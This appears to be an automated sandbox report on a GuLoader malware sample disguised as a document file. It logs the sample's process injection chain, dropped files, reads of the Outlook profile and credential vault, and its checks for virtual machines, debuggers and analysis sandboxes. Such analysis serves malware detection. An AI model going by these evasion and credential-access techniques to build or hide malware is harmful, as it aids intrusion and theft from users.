            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeProcess created: C:\Windows\SysWOW64\waitfor.exe "C:\Windows\SysWOW64\waitfor.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\waitfor.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Document_084462.scr.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Users\user\Desktop\Document_084462.scr.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Document_084462.scr.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Document_084462.scr.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Document_084462.scr.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\Document_084462.scr.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Document_084462.scr.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Document_084462.scr.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Users\user\Desktop\Document_084462.scr.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\Document_084462.scr.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Document_084462.scr.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\Document_084462.scr.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Document_084462.scr.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Document_084462.scr.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Document_084462.scr.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\Document_084462.scr.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\Document_084462.scr.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\Document_084462.scr.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\Document_084462.scr.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\Document_084462.scr.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\Document_084462.scr.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\Document_084462.scr.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Document_084462.scr.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Document_084462.scr.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Document_084462.scr.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\Document_084462.scr.exeSection loaded: msi.dllJump to behavior
            Source: C:\Users\user\Desktop\Document_084462.scr.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\Document_084462.scr.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\Document_084462.scr.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Users\user\Desktop\Document_084462.scr.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\Document_084462.scr.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Users\user\Desktop\Document_084462.scr.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\Document_084462.scr.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Users\user\Desktop\Document_084462.scr.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Users\user\Desktop\Document_084462.scr.exeSection loaded: msi.dllJump to behavior
            Source: C:\Users\user\Desktop\Document_084462.scr.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\Document_084462.scr.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Document_084462.scr.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Document_084462.scr.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Document_084462.scr.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Document_084462.scr.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\Document_084462.scr.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\Document_084462.scr.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Document_084462.scr.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\Document_084462.scr.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\Document_084462.scr.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\Document_084462.scr.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Document_084462.scr.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\Document_084462.scr.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\Document_084462.scr.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\Document_084462.scr.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\Document_084462.scr.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Document_084462.scr.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Document_084462.scr.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Document_084462.scr.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\Document_084462.scr.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\Document_084462.scr.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Document_084462.scr.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Document_084462.scr.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\Document_084462.scr.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Document_084462.scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\waitfor.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: Document_084462.scr.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: waitfor.pdbGCTL source: Document_084462.scr.exe, 00000001.00000002.13294981161.000000000776D000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: waitfor.pdb source: Document_084462.scr.exe, 00000001.00000002.13294981161.000000000776D000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdbUGP source: Document_084462.scr.exe, 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Document_084462.scr.exe, Document_084462.scr.exe, 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmp, waitfor.exe

            Data Obfuscation

            barindex
            Yara detected GuLoader
            Source: Yara matchFile source: 00000001.00000002.13274829512.00000000067E0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.12951622773.0000000009B40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 0_2_700B1B5F GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_700B1B5F
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37A897A1 push es; iretd 1_2_37A897A8
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37A821AD pushad ; retf 0004h1_2_37A8223F
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AB08CD push ecx; mov dword ptr [esp], ecx1_2_37AB08D6
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_00125075 push ss; iretd 1_2_00125088
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_00135242 push eax; ret 1_2_00135244
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_001244B3 push esp; retf 1_2_001244B5
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_00124F98 push ss; iretd 1_2_00125088
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 2_2_034E7F98 push ss; iretd 2_2_034E8088
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 2_2_034F8242 push eax; ret 2_2_034F8244
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 2_2_034E9252 pushfd ; retf 2_2_034E925D
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 2_2_034E8075 push ss; iretd 2_2_034E8088
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 2_2_03470008 push edi; ret 2_2_03470009
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 2_2_034E98C4 pushfd ; ret 2_2_034E98E8
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 2_2_034E98A7 pushad ; retf 2_2_034E98A8
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 2_2_034E74B3 push esp; retf 2_2_034E74B5
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04A708CD push ecx; mov dword ptr [esp], ecx3_2_04A708D6
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04D944B3 push esp; retf 3_2_04D944B5
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04D95075 push ss; iretd 3_2_04D95088
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04D96252 pushfd ; retf 3_2_04D9625D
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04DA5242 push eax; ret 3_2_04DA5244
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04D94F98 push ss; iretd 3_2_04D95088
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04D968C4 pushfd ; ret 3_2_04D968E8
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04D968A7 pushad ; retf 3_2_04D968A8
            Source: C:\Users\user\Desktop\Document_084462.scr.exeFile created: C:\Users\user\AppData\Local\Temp\nsqE4B5.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\Document_084462.scr.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspiresJump to behavior
            Source: C:\Users\user\Desktop\Document_084462.scr.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires\Reconsolidates.IndJump to behavior
            Source: C:\Users\user\Desktop\Document_084462.scr.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires\Sulfoforbindelserne.chlJump to behavior
            Source: C:\Users\user\Desktop\Document_084462.scr.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires\Umpiress240.bivJump to behavior
            Source: C:\Users\user\Desktop\Document_084462.scr.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires\potmaker.stiJump to behavior
            Source: C:\Users\user\Desktop\Document_084462.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Document_084462.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Document_084462.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\waitfor.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\waitfor.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\waitfor.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\waitfor.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\waitfor.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\Document_084462.scr.exeAPI/Special instruction interceptor: Address: 9D8E19C
            Source: C:\Users\user\Desktop\Document_084462.scr.exeAPI/Special instruction interceptor: Address: 6A2E19C
            Source: C:\Users\user\Desktop\Document_084462.scr.exeAPI/Special instruction interceptor: Address: 7FFCB7650594
            Source: C:\Users\user\Desktop\Document_084462.scr.exeAPI/Special instruction interceptor: Address: 7FFCB764FF74
            Source: C:\Users\user\Desktop\Document_084462.scr.exeAPI/Special instruction interceptor: Address: 7FFCB764D6C4
            Source: C:\Users\user\Desktop\Document_084462.scr.exeAPI/Special instruction interceptor: Address: 7FFCB764D864
            Source: C:\Windows\SysWOW64\waitfor.exeAPI/Special instruction interceptor: Address: 7FFCB764D144
            Source: C:\Windows\SysWOW64\waitfor.exeAPI/Special instruction interceptor: Address: 7FFCB7650594
            Source: C:\Windows\SysWOW64\waitfor.exeAPI/Special instruction interceptor: Address: 7FFCB764D764
            Source: C:\Windows\SysWOW64\waitfor.exeAPI/Special instruction interceptor: Address: 7FFCB764D324
            Source: C:\Windows\SysWOW64\waitfor.exeAPI/Special instruction interceptor: Address: 7FFCB764D364
            Source: C:\Windows\SysWOW64\waitfor.exeAPI/Special instruction interceptor: Address: 7FFCB764D004
            Source: C:\Windows\SysWOW64\waitfor.exeAPI/Special instruction interceptor: Address: 7FFCB764FF74
            Source: C:\Windows\SysWOW64\waitfor.exeAPI/Special instruction interceptor: Address: 7FFCB764D6C4
            Source: C:\Windows\SysWOW64\waitfor.exeAPI/Special instruction interceptor: Address: 7FFCB764D864
            Source: C:\Windows\SysWOW64\waitfor.exeAPI/Special instruction interceptor: Address: 7FFCB764D604
            Tries to detect Any.run
            Source: C:\Users\user\Desktop\Document_084462.scr.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
            Source: C:\Users\user\Desktop\Document_084462.scr.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
            Source: C:\Users\user\Desktop\Document_084462.scr.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
            Source: C:\Users\user\Desktop\Document_084462.scr.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
            Source: Document_084462.scr.exe, 00000000.00000002.12949271205.0000000000858000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE0Y
            Source: Document_084462.scr.exe, 00000000.00000002.12950443408.0000000000F30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AF1763 rdtsc 1_2_37AF1763
            Source: C:\Windows\SysWOW64\waitfor.exeWindow / User API: threadDelayed 9085Jump to behavior
            Source: C:\Users\user\Desktop\Document_084462.scr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsqE4B5.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\Document_084462.scr.exeAPI coverage: 0.3 %
            Source: C:\Windows\SysWOW64\waitfor.exeAPI coverage: 1.2 %
            Source: C:\Windows\SysWOW64\waitfor.exe TID: 2196Thread sleep count: 121 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\waitfor.exe TID: 2196Thread sleep time: -242000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\waitfor.exe TID: 2196Thread sleep count: 9085 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\waitfor.exe TID: 2196Thread sleep time: -18170000s >= -30000sJump to behavior
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\waitfor.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\waitfor.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 0_2_0040674C FindFirstFileW,FindClose,0_2_0040674C
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 0_2_00405B00 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405B00
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 0_2_00402902 FindFirstFileW,0_2_00402902
            Source: Document_084462.scr.exe, 00000000.00000002.12969572921.000000000A869000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
            Source: Document_084462.scr.exe, 00000000.00000002.12969572921.000000000A869000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
            Source: Document_084462.scr.exe, 00000000.00000002.12969572921.000000000A869000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicshutdown
            Source: Document_084462.scr.exe, 00000000.00000002.12969572921.000000000A869000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
            Source: Document_084462.scr.exe, 00000000.00000002.12949271205.0000000000858000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe0Y
            Source: Document_084462.scr.exe, 00000000.00000002.12969572921.000000000A869000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
            Source: Document_084462.scr.exe, 00000000.00000002.12969572921.000000000A869000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
            Source: Document_084462.scr.exe, 00000000.00000002.12969572921.000000000A869000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicvss
            Source: Document_084462.scr.exe, 00000001.00000002.13294715247.00000000076CA000.00000004.00000020.00020000.00000000.sdmp, Document_084462.scr.exe, 00000001.00000003.13191168732.0000000007702000.00000004.00000020.00020000.00000000.sdmp, Document_084462.scr.exe, 00000001.00000002.13294914871.0000000007702000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: Document_084462.scr.exe, 00000000.00000002.12950443408.0000000000F30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: Document_084462.scr.exe, 00000000.00000002.12969572921.000000000A869000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
            Source: Document_084462.scr.exe, 00000000.00000002.12969572921.000000000A869000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
            Source: Document_084462.scr.exe, 00000000.00000002.12969572921.000000000A869000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
            Source: Document_084462.scr.exe, 00000000.00000002.12969572921.000000000A869000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
            Source: C:\Users\user\Desktop\Document_084462.scr.exeAPI call chain: ExitProcess graph end nodegraph_0-4301
            Source: C:\Users\user\Desktop\Document_084462.scr.exeAPI call chain: ExitProcess graph end nodegraph_0-4455
            Source: C:\Windows\SysWOW64\waitfor.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\waitfor.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AF1763 rdtsc 1_2_37AF1763
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 0_2_00405456 GetTickCount,lstrlenW,lstrlenW,lstrcatW,SetWindowTextW,SendMessageW,SendMessageW,LdrInitializeThunk,SendMessageW,SendMessageW,0_2_00405456
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 0_2_700B1B5F GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_700B1B5F
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B817BC mov eax, dword ptr fs:[00000030h]1_2_37B817BC
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B7D7A7 mov eax, dword ptr fs:[00000030h]1_2_37B7D7A7
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B7D7A7 mov eax, dword ptr fs:[00000030h]1_2_37B7D7A7
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B7D7A7 mov eax, dword ptr fs:[00000030h]1_2_37B7D7A7
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AE1796 mov eax, dword ptr fs:[00000030h]1_2_37AE1796
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AE1796 mov eax, dword ptr fs:[00000030h]1_2_37AE1796
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B8B781 mov eax, dword ptr fs:[00000030h]1_2_37B8B781
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B8B781 mov eax, dword ptr fs:[00000030h]1_2_37B8B781
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AB37E4 mov eax, dword ptr fs:[00000030h]1_2_37AB37E4
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AB37E4 mov eax, dword ptr fs:[00000030h]1_2_37AB37E4
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AB37E4 mov eax, dword ptr fs:[00000030h]1_2_37AB37E4
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AB37E4 mov eax, dword ptr fs:[00000030h]1_2_37AB37E4
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AB37E4 mov eax, dword ptr fs:[00000030h]1_2_37AB37E4
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AB37E4 mov eax, dword ptr fs:[00000030h]1_2_37AB37E4
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AB37E4 mov eax, dword ptr fs:[00000030h]1_2_37AB37E4
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AB77F9 mov eax, dword ptr fs:[00000030h]1_2_37AB77F9
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AB77F9 mov eax, dword ptr fs:[00000030h]1_2_37AB77F9
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B6F7CF mov eax, dword ptr fs:[00000030h]1_2_37B6F7CF
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AD9723 mov eax, dword ptr fs:[00000030h]1_2_37AD9723
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B6F717 mov eax, dword ptr fs:[00000030h]1_2_37B6F717
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ABD700 mov ecx, dword ptr fs:[00000030h]1_2_37ABD700
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AAB705 mov eax, dword ptr fs:[00000030h]1_2_37AAB705
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AAB705 mov eax, dword ptr fs:[00000030h]1_2_37AAB705
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AAB705 mov eax, dword ptr fs:[00000030h]1_2_37AAB705
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AAB705 mov eax, dword ptr fs:[00000030h]1_2_37AAB705
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B7970B mov eax, dword ptr fs:[00000030h]1_2_37B7970B
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B7970B mov eax, dword ptr fs:[00000030h]1_2_37B7970B
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B6F773 mov eax, dword ptr fs:[00000030h]1_2_37B6F773
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AF1763 mov eax, dword ptr fs:[00000030h]1_2_37AF1763
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AF1763 mov eax, dword ptr fs:[00000030h]1_2_37AF1763
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AF1763 mov eax, dword ptr fs:[00000030h]1_2_37AF1763
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AF1763 mov eax, dword ptr fs:[00000030h]1_2_37AF1763
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AF1763 mov eax, dword ptr fs:[00000030h]1_2_37AF1763
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AF1763 mov eax, dword ptr fs:[00000030h]1_2_37AF1763
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AE174A mov eax, dword ptr fs:[00000030h]1_2_37AE174A
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AE3740 mov eax, dword ptr fs:[00000030h]1_2_37AE3740
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AAF75B mov eax, dword ptr fs:[00000030h]1_2_37AAF75B
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AAF75B mov eax, dword ptr fs:[00000030h]1_2_37AAF75B
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AAF75B mov eax, dword ptr fs:[00000030h]1_2_37AAF75B
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AAF75B mov eax, dword ptr fs:[00000030h]1_2_37AAF75B
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AAF75B mov eax, dword ptr fs:[00000030h]1_2_37AAF75B
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AAF75B mov eax, dword ptr fs:[00000030h]1_2_37AAF75B
